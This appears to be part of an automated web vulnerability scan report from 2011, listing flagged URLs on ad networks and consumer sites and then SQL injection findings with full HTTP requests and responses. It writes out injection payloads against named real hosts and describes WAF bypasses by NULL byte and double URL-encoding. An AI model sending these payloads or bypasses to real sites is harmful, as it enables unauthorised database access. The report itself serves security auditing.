27.10. http://ad.doubleclick.net/adi/N553.msn.com/B5114832.2

27.11. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5

27.12. http://ad.doubleclick.net/adi/dmd.ehow/computers

27.13. http://ad.doubleclick.net/adi/dmd.ehow/homepage

27.14. http://ad.doubleclick.net/clk

27.15. http://ad.yieldmanager.com/iframe3

27.16. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js

27.17. https://admin.testandtarget.omniture.com/skins/omniture/terms_of_use.html

27.18. http://amihackerproof.com/

27.19. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

27.20. http://dillerdesign.com/experiment/DD_belatedPNG/

27.21. http://ds.addthis.com/red/psi/p.json

27.22. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json

27.23. http://fast.dm.demdex.net/dm-dest.html

27.24. http://hit.clickaider.com/pv

27.25. http://hostedusa3.whoson.com/

27.26. http://hostedusa3.whoson.com/include.js

27.27. http://hostedusa3.whoson.com/invite.js

27.28. http://hostedusa3.whoson.com/poll.gif

27.29. http://hostedusa3.whoson.com/stat.gif

27.30. http://jqueryui.com/about

27.31. http://kona10.kontera.com/

27.32. http://kona5.kontera.com/favicon.ico

27.33. http://local.msn.com/ten-day.aspx

27.34. http://local.msn.com/weather.aspx

27.35. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.36. http://pixel.invitemedia.com/data_sync

27.37. http://r.nexac.com/e/getdata.xgi

27.38. http://seg.sharethis.com/getSegment.php

27.39. http://showads.pubmatic.com/AdServer/AdServerServlet

27.40. http://sr2.liveperson.net/visitor/addons/deploy.asp

27.41. https://trustsealinfo.verisign.com/splash

27.42. http://uac.advertising.com/wrapper/aceUACping.htm

27.43. http://wp-superslider.com/index.php

27.44. http://www.amihackerproof.com/

27.45. http://www.autocheck.com/

27.46. http://www.dillerdesign.com/experiment/DD_belatedPNG/

27.47. http://www.ehow.co.uk/

27.48. http://www.ehow.com/xd_receiver.htm

27.49. https://www.ehow.com/xd_receiver.htm

27.50. http://www.google.com/instant/

27.51. http://www.google.com/intl/en/about.html

27.52. http://www.google.com/intl/en/ads/

27.53. http://www.google.com/intl/en/options/

27.54. http://www.opinionlab.com/ozone/24-7.asp

27.55. http://www.orbitz.com/App/ViewDHTMLCalendar

27.56. http://www.orbitz.com/App/ViewTravelWatchHome

27.57. http://www.orbitz.com/cacheable/ad.html

27.58. http://www.orbitz.com/cacheable/ad_empty.html

27.59. http://www.orbitz.com/cacheable/empty.html

27.60. http://www.orbitz.com/shared/adserverProxy.jsp

27.61. https://www.orbitz.com/Secure/ViewSecureCalendar

27.62. http://www.ppcse.net/

27.63. http://www.robtex.com/ext/ads/nb728.html

27.64. http://www.robtex.com/ext/ads/nt728.html

27.65. http://www.stocktrader.org.uk/remote2/ST1-

27.66. http://www.stocktrader.org.uk/remote2/ST1-1.php

27.67. http://www.stocktrader.org.uk/remote2/ST1-2.php

27.68. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

27.69. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

27.70. http://www.wizzsurf.com/

27.71. http://www.worldmastiffforum.com/favicon.ico

27.72. http://xss-proxy.sourceforge.net/

28. HTML uses unrecognised charset

28.1. http://ccc01.opinionlab.com/o.asp

28.2. https://faq.orbitz.com/

28.3. https://faq.orbitz.com/app/answers/detail/a_id/15644

28.4. https://secure.opinionlab.com/ccc01/o.asp

29. Content type incorrectly stated

29.1. http://a.rad.msn.com/ADSAdClient31.dll

29.2. https://a248.e.akamai.net/demdex.download.akamai.com/dm/

29.3. http://a3.twimg.com/profile_images/299906134/acangiano_normal.gif

29.4. http://ad.doubleclick.net/clk

29.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213**

29.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295**

29.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

29.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1377911769

29.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

29.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/991035629

29.11. https://admin.testandtarget.omniture.com/login_hal.css

29.12. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js

29.13. https://admin.testandtarget.omniture.com/skins/omniture/login.css

29.14. https://admin.testandtarget.omniture.com/skins/omniture/static_header.css

29.15. http://api.blogburst.com/EntityImageHandler.ashx

29.16. http://api.blogburst.com/favicon.ico

29.17. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx

29.18. http://bannerfarm.ace.advertising.com/bannerfarm/84352/siteIDs.txt

29.19. http://blekko.com/autocomplete

29.20. http://blekko.com/tag/pref

29.21. http://boardreader.com/favicon.ico

29.22. http://boardreader.com/linksGraphXML.php

29.23. http://boardreader.com/moduleindex.php

29.24. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

29.25. http://cdn.demdex.net/dm/

29.26. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

29.27. http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

29.28. https://gc.synxis.com/XBE/Popups/InfoPopup.aspx

29.29. http://hostedusa3.whoson.com/include.js

29.30. http://hostedusa3.whoson.com/invite.js

29.31. http://investing.money.msn.com/mv/MarketStatus

29.32. http://investing.money.msn.com/mv/RecentQuotes/

29.33. http://kona5.kontera.com/KonaGet.js

29.34. https://leads.demandbase.com/

29.35. http://local.msn.com/ten-day.aspx

29.36. http://local.msn.com/weather.aspx

29.37. https://maps-api-ssl.google.com/maps/api/js

29.38. http://maps.google.com/maps/api/js

29.39. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.40. http://offers.lendingtree.com/splitter/splitter.ashx

29.41. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

29.42. http://r.nexac.com/e/getdata.xgi

29.43. http://rad.msn.com/ADSAdClient31.dll

29.44. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

29.45. http://showads.pubmatic.com/AdServer/AdServerServlet

29.46. http://sociallist.org/widget.js

29.47. http://sr2.liveperson.net/hcp/html/mTag.js

29.48. http://sr2.liveperson.net/visitor/addons/deploy.asp

29.49. https://trustseal.verisign.com/getseal

29.50. http://trw.com/00_assets/02_videos/Orb_Loop.flv

29.51. http://trw.com/sites/default/themes/trw/images/footer_sep.gif

29.52. http://twitter.com/favorites/toptweets.json

29.53. http://twitter.com/oexchange.xrd

29.54. https://twitter.com/oexchange.xrd

29.55. http://urls.api.twitter.com/1/urls/count.json

29.56. https://www.astaro.com/design/en/images/icons/favicon.ico

29.57. http://www.bing.com/local/ypdefault.aspx

29.58. http://www.bing.com/search

29.59. http://www.bing.com/shopping

29.60. http://www.bing.com/shopping/pet-beds/c/5533

29.61. http://www.bing.com/shopping/photo-storage-presentation/search

29.62. http://www.bing.com/shopping/search

29.63. http://www.bing.com/shopping/televisions/c/4724

29.64. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

29.65. http://www.bing.com/shopping/womens-workout-clothing/r/146

29.66. http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do

29.67. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

29.68. http://www.bing.com/travel/hotels

29.69. https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx

29.70. http://www.facebook.com/extern/login_status.php

29.71. http://www.google.com/search

29.72. http://www.mensfitness.com/favicon.ico

29.73. http://www.omniture.com/listener.html

29.74. http://www.orbitz.com/App/ViewTravelWatchHome

29.75. http://www.orbitz.com/cacheable/empty.html

29.76. http://www.orbitz.com/helper/populateStateList

29.77. http://www.orbitz.com/helper/smartfill

29.78. http://www.plentyoffish.com/JpegImage.aspx

29.79. http://www.plentyoffish.com/accordian.pack.js

29.80. http://www.plentyoffish.com/member11499165.htm

29.81. http://www.plentyoffish.com/member1242943.htm

29.82. http://www.plentyoffish.com/member16373418.htm

29.83. http://www.plentyoffish.com/member19992238.htm

29.84. http://www.plentyoffish.com/member22529971.htm

29.85. http://www.plentyoffish.com/member22970699.htm

29.86. http://www.plentyoffish.com/member23010679.htm

29.87. http://www.plentyoffish.com/member23031204.htm

29.88. http://www.plentyoffish.com/member23817184.htm

29.89. http://www.plentyoffish.com/member24663198.htm

29.90. http://www.plentyoffish.com/member24778333.htm

29.91. http://www.plentyoffish.com/member25294614.htm

29.92. http://www.plentyoffish.com/member25300504.htm

29.93. http://www.plentyoffish.com/member25401489.htm

29.94. http://www.plentyoffish.com/member25429166.htm

29.95. http://www.plentyoffish.com/needs_test.aspx

29.96. http://www.plentyoffish.com/safety.aspx

29.97. http://www.plentyoffish.com/terms.aspx

29.98. http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=script&pos=middle&

29.99. http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=script&pos=middle&

29.100. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script&

29.101. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

29.102. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

29.103. http://www.stocktrader.org.uk/remote2/ST1-1.php

29.104. http://www.techmynd.com/feed/atom/

29.105. http://www.threatexpert.com/settings.xml

29.106. http://www.w3.org/TR/html4/strict.dtd

29.107. http://www.websitetoolbox.com/cgi/stat/js.cgi

30. Content type is not specified

30.1. http://ad.reduxmedia.com/st

30.2. http://ad.yieldmanager.com/st

30.3. https://login.hitbox.com/dhtml.js,utility.js,cookie.js,helpers.js,dom_object_extensions.js,dom_selectbox.js,dom_autosuggest.js

30.4. https://login.hitbox.com/images/001982.banner_viralvideo_v1.hbx923x320.jpg

30.5. https://login.hitbox.com/images/bg_button.gif

30.6. https://login.hitbox.com/images/bg_footer_dash.gif

30.7. https://login.hitbox.com/images/bg_masthead.gif

30.8. https://login.hitbox.com/images/footer_graphic.gif

30.9. https://login.hitbox.com/images/icon_close_small.gif

30.10. https://login.hitbox.com/images/img_customer_service.gif

30.11. https://login.hitbox.com/images/logo_hbx_analytics.gif

30.12. https://login.hitbox.com/js/hbx.js

30.13. https://login.hitbox.com/login

30.14. https://login.hitbox.com/px.gif

30.15. https://login.hitbox.com/ss_style.css

30.16. http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard

30.17. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

31. SSL certificate

31.1. https://ads.pof.com/

31.2. https://www.astaro.com/

1. SQL injection
There are 20 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [PG parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The PG parameter appears to be vulnerable to SQL injection attacks. The payloads 66872473'%20or%201%3d1--%20 and 66872473'%20or%201%3d2--%20 were each submitted in the PG parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d1--%20&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:21:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:21:37 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:21:37 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 856

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d1--%20&ASI
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/7_texture_120x30-120x30NL.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }
   
   wsod_image();
   

Request 2

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d2--%20&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:21:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:21:38 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38885:1296915698:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:21:38 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 845

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d2--%20&ASI
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/120x30 Static.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }
   
   wsod_image();
   

1.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [i_34 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The i_34 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the i_34 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2'%20and%201%3d1--%20; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:22:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:22:57 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:38885:1296915777:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:22:57 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 829

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a4
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/7_texture_120x30-120x30NL.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }
   
   wsod_image();
   

Request 2

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2'%20and%201%3d2--%20; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:22:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:22:58 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38885:1296915778:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:22:58 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 818

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a4
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/120x30 Static.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }
   
   wsod_image();
   

1.3. http://blekko.com/ws/+/adsense=9396229490951644 [suggestedSlashtagsList cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/adsense=9396229490951644

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/+/adsense=9396229490951644 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%00'; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:38:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:38:35 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 69227
X-Blekko-QF: hq
X-Blekko-PT: 043e4df497bc60c2f9d74ccf2865876e

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
form CSRF attacks against FTP services, in this case Sun Solaris 10 ftpd. An attacker could embed a payload such as the following to execute commands on ftpd. The NetBSD team addressed this issue by failing on large commands.</p>
...[SNIP]...

Request 2

GET /ws/+/adsense=9396229490951644 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%00''; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:35 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.4. http://blekko.com/ws/+/ip=207.97.227.239 [sessionid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/ip=207.97.227.239

Issue detail

The sessionid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sessionid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sessionid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/ip=207.97.227.239 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924%2527; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:38:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:38:49 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 67781
X-Blekko-QF: hq
X-Blekko-PT: c6c42f446173c6636976da330a49adfe

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<p class="desc" id="snippet9">Generating SSH keys. Attempting to redirect to the guide for your OS. If the redirect fails, pick your OS. How to install git. How to generate SSH keys and add them to GitHub.</p>
...[SNIP]...

Request 2

GET /ws/+/ip=207.97.227.239 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924%2527%2527; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:49 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.5. http://blekko.com/ws/+/press-videos [fbl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The fbl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fbl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the fbl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
